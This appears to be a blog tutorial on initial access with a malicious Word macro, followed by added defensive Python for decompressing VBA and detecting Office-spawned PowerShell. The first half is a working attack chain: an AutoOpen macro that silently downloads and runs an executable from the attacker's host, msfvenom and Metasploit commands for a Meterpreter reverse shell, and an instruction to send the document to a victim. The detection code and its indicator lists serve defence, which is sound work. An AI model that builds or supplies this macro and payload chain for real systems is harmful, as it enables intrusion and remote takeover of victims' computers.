Initial access using a Malicious Document (MalDoc)

Hussain
3 min read · Aug 29, 2023

Setup:

1. Linux environment (Attacker)
  • Metasploit
  • Python
2. Windows environment (Target)
  • Windows Defender disabled
  • MS Office

1. Developing a Malicious Document (MalDoc): Techniques and Considerations

First, we will create a document containing an embedded macro. When the document is opened, the macro will automatically execute, initiating the download of a malicious Meterpreter payload and subsequently executing it.

Follow the steps:

1. Create any MS document file with a name of your choice.
2. Open the document, go to the View tab, open the Macros menu and choose View Macros.
3. Give the macro a name, choose the document in which to store it, and click Create.
4. Copy the VBA code below into the editor, replacing the IP address and port with those of the attacker machine's HTTP server.

Sub Exec()
    ' Late-bound Windows Script Host shell object, used to launch the command
    Dim shell
    Set shell = CreateObject("WScript.Shell")

    ' Name of the file that will be fetched and run
    Dim scriptName
    scriptName = "test.exe"

    ' Destination: the directory the document is currently working in
    Dim scriptPath
    scriptPath = shell.CurrentDirectory & "\" & scriptName

    ' PowerShell one-liner: download from the attacker's HTTP server, then run it
    Dim command
    command = "powershell -ExecutionPolicy Bypass -Command ""$webClient = New-Object System.Net.WebClient; $sourceUrl = 'http://192.168.186.130:8000/" & scriptName & "'; $destinationPath = '" & scriptPath & "'; $webClient.DownloadFile($sourceUrl, $destinationPath); & '" & scriptPath & "'"""

    ' Window style 0 (hidden); True = wait for the command to finish
    shell.Run command, 0, True
End Sub

' Auto-macro entry point: runs automatically when the document is opened with macros enabled
Sub AutoOpen()
    Exec
End Sub

The VBA code above downloads an executable from the attacker's HTTP server, saves it in the document's current directory, and then runs it through the Windows Script Host shell object (WScript.Shell). The AutoOpen procedure triggers it as soon as the document is opened with macros enabled.

5. Save and close the document.
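
The defender's counterpart to the macro just built is static triage of the document's VBA. The following Python is an added example for this post, not the author's code: it decompresses a VBA module stream from the MS-OVBA compressed-container format that vbaProject.bin uses for module source, then scans the recovered text for the auto-run entry point and the download-and-execute indicators present in the macro above (it also covers Excel's Auto_Open/Workbook_Open names, going slightly beyond the Word case shown). It assumes the module stream has already been extracted from the OLE container (for example with olefile) and sliced at the MODULEOFFSET recorded in the dir stream; the compressed sample is constructed with a literal-only packer included for testing.

```python
"""Static triage of a VBA module stream: MS-OVBA decompression plus an
indicator scan. Added example for this post, not the author's code.

Assumption: the module stream has already been pulled out of the OLE/CFB
container vbaProject.bin (e.g. with olefile) and sliced at the MODULEOFFSET
given in the 'dir' stream, so the bytes passed in start at the 0x01
signature of the compressed source."""
import re

# Auto-execute entry points and indicators taken from the macro in the post.
AUTOEXEC_NAMES = ("AutoOpen", "Auto_Open", "Document_Open", "Workbook_Open", "AutoExec")
SUSPICIOUS_PATTERNS = {
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.I),
    "shell_run": re.compile(r"\.Run\b", re.I),
    "powershell": re.compile(r"\bpowershell\b", re.I),
    "exec_policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "download": re.compile(r"DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I),
    "url": re.compile(r"https?://", re.I),
    "exe_reference": re.compile(r"\.exe\b", re.I),
}


def ovba_decompress(container: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (MS-OVBA 2.4.1): a 0x01
    signature followed by chunks of literal/copy tokens (LZ77-style)."""
    if not container or container[0] != 0x01:
        raise ValueError("missing 0x01 CompressedContainer signature")
    out = bytearray()
    pos = 1
    while pos < len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        chunk_size = (header & 0x0FFF) + 3       # size field excludes 3 bytes
        is_compressed = bool(header & 0x8000)
        chunk_end = min(pos + chunk_size, len(container))
        pos += 2
        chunk_start = len(out)                   # origin for offset/bit-count maths
        if not is_compressed:                    # raw chunk: 4096 literal bytes
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = container[pos]               # one bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not flags & (1 << bit):       # 0 = literal byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token = int.from_bytes(container[pos:pos + 2], "little")
                pos += 2
                # Offset/length split depends on how much of this chunk is out.
                produced = len(out) - chunk_start
                bit_count = max(4, (produced - 1).bit_length())
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):          # byte-wise so overlaps work
                    out.append(out[-offset])
    return bytes(out)


def ovba_pack_literal_only(data: bytes) -> bytes:
    """Test helper: wrap data in one valid chunk using only literal tokens.
    Valid per spec but unoptimised; limited to a single chunk."""
    if len(data) > 3640:
        raise ValueError("single literal-only chunk holds at most 3640 bytes")
    body = bytearray()
    for i in range(0, len(data), 8):
        body.append(0x00)                        # flag byte: all tokens literal
        body += data[i:i + 8]
    header = 0xB000 | (len(body) + 2 - 3)        # flag=1, signature 0b011, size-3
    return b"\x01" + header.to_bytes(2, "little") + bytes(body)


def scan_vba_source(source: str) -> dict:
    """Score recovered VBA source for an auto-run trigger plus download/run."""
    autoexec = [n for n in AUTOEXEC_NAMES
                if re.search(r"\bSub\s+" + re.escape(n) + r"\s*\(", source, re.I)]
    hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(source)]
    urls = re.findall(r"https?://[^\s'\"]+", source, re.I)
    # The post's chain: auto-run + network fetch + launching something.
    high_risk = bool(autoexec) and "download" in hits and \
        ("shell_run" in hits or "powershell" in hits)
    return {"autoexec": autoexec, "indicators": hits, "urls": urls, "high_risk": high_risk}


def triage_module_stream(stream: bytes) -> dict:
    """Decompress a module stream and scan it (latin-1 never fails to decode)."""
    return scan_vba_source(ovba_decompress(stream).decode("latin-1"))


# Constructed sample: the post's macro, packed with the helper above to stand
# in for a module stream extracted from vbaProject.bin.
SAMPLE_MODULE = (
    "Sub Exec()\r\n"
    "    Set shell = CreateObject(\"WScript.Shell\")\r\n"
    "    command = \"powershell -ExecutionPolicy Bypass -Command \"\"$webClient = New-Object "
    "System.Net.WebClient; $webClient.DownloadFile('http://192.168.186.130:8000/test.exe', "
    "'test.exe'); & '.\\test.exe'\"\"\"\r\n"
    "    shell.Run command, 0, True\r\n"
    "End Sub\r\n"
    "Sub AutoOpen()\r\n    Exec\r\nEnd Sub\r\n"
)

if __name__ == "__main__":
    print(triage_module_stream(ovba_pack_literal_only(SAMPLE_MODULE.encode())))
```

The string heuristics only work because the decompressor runs first: module source inside vbaProject.bin is stored compressed, so grepping the raw .bin for "AutoOpen" or "DownloadFile" will usually miss it. Tools such as olevba do the same decompression and additionally walk the OLE container for you.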

2. Generating and Staging a Meterpreter Executable from Metasploit

Create a Windows executable on your attacker machine using the msfvenom tool.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.186.130 LPORT=4443 -f exe -o test.exe

Use Python's http.server module to serve the payload.

python3 -m http.server

Run this from the directory that contains test.exe: http.server serves the current working directory, on port 8000 by default, which matches the URL in the macro.

3. Execution and reverse shell

To configure the listener in the Metasploit Framework, run the commands below.

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.186.130
set lport 4443
exploit

Once the listener is waiting for connections, send the malicious document to the intended victim. Then, taking the role of the victim, open the document and click the Enable Content button, which allows the macro to run.

The listener will then receive a reverse Meterpreter session.
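
From the blue-team side, the whole chain leaves a distinctive process-creation trail: an Office application spawning powershell.exe with a download cradle, followed by a script host launching an executable from a user-writable directory. The following Python is an added example, not part of the original post: it runs a small rule set over constructed JSON-lines telemetry shaped like Sysmon Event ID 1 records (fields UtcTime, User, ParentImage, Image, CommandLine are assumed), using the command-line indicators visible in the macro above and the msfvenom-generated test.exe drop.

```python
"""Detection over process-creation telemetry for the chain in the post:
Office app -> powershell.exe -> download -> dropped .exe. Added example,
not the author's code.

Assumptions: events are JSON lines with Sysmon Event ID 1-like fields
(UtcTime, User, ParentImage, Image, CommandLine); the sample log below is
constructed for this example, not real telemetry."""
import json
import re
from typing import Iterable, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line indicators lifted from the macro's PowerShell one-liner.
CMDLINE_INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "webclient_download": re.compile(
        r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I),
    "remote_url": re.compile(r"https?://\S+", re.I),
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "invokes_exe": re.compile(r"&\s*'[^']*\.exe'", re.I),
}
# Executable started from a user-writable location by a script host.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:Downloads|Documents|Desktop|AppData)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_event(ev: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious process start, else None."""
    parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    indicators = [n for n, p in CMDLINE_INDICATORS.items() if p.search(cmd)]
    office_spawn = parent in OFFICE_APPS and child in SCRIPT_HOSTS
    if parent in SCRIPT_HOSTS and USER_WRITABLE.search(ev.get("Image", "")):
        indicators.append("script_host_ran_user_dir_exe")
    # Severity: Office spawning a script host is notable by itself; with a
    # download cradle in the command line it is the post's chain end to end.
    if office_spawn and "webclient_download" in indicators:
        severity = "high"
    elif office_spawn or (
            "webclient_download" in indicators and "execution_policy_bypass" in indicators):
        severity = "medium"
    elif indicators:
        severity = "low"
    else:
        return None
    return {"time": ev.get("UtcTime"), "user": ev.get("User"), "parent": parent,
            "child": child, "office_spawn": office_spawn,
            "indicators": indicators, "severity": severity}


def detect(lines: Iterable[str]) -> list:
    """Run evaluate_event over JSON lines, skipping unparsable ones."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = evaluate_event(ev)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry (not real logs): the chain from the post plus
# benign noise, serialised as JSON lines in time order.
_EVENTS = [
    {"UtcTime": "2023-08-29 10:15:02.113", "User": "LAB\\alice",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -Command \"$webClient = New-Object "
                    "System.Net.WebClient; $webClient.DownloadFile('http://192.168.186.130:8000/test.exe', "
                    "'C:\\Users\\alice\\Documents\\test.exe'); & 'C:\\Users\\alice\\Documents\\test.exe'\""},
    {"UtcTime": "2023-08-29 10:15:04.900", "User": "LAB\\alice",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Image": "C:\\Users\\alice\\Documents\\test.exe",
     "CommandLine": "C:\\Users\\alice\\Documents\\test.exe"},
    {"UtcTime": "2023-08-29 10:15:30.000", "User": "LAB\\bob",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -Command Get-Process"},
    {"UtcTime": "2023-08-29 10:16:11.420", "User": "LAB\\alice",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c echo hello"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in _EVENTS)

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(a["severity"], a["parent"], "->", a["child"], a["indicators"])
```

The parent/child pairing is the robust part of the rule: the PowerShell string indicators are easy to rewrite, but an Office process creating a script host is rare on most user endpoints, which is why it earns a medium severity even with an empty command line.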
